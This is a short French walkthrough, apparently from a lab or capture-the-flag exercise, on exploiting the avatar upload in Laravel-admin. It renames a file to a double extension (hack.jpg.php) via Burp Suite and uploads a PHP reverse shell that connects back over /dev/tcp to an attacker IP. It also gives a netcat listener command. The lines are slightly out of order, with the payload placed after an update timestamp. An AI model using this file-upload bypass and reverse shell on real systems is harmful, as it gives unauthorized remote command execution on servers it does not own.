Dans l'application Laravel-admin, une section permet de télécharger un avatar. En exploitant cette fonctionnalité, nous pouvons envoyer un fichier malveillant pour obtenir un accès non autorisé au serveur.
Interception et modification du fichier d'avatar :
Interceptez la requête avec Burp Suite.
Modifiez la valeur de la variable filename pour y ajouter l'extension PHP après un faux fichier d'image, par exemple : hack.jpg.php.
filename
hack.jpg.php
Le contenu du fichier doit être un reverse shell, tel que :
Mise en écoute avec Netcat :
Lancez l'écoute sur le port 443 avec Netcat :
Mis à jour il y a 1 an
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.9/443 0>&1'"); ?>
nc -nlvp 443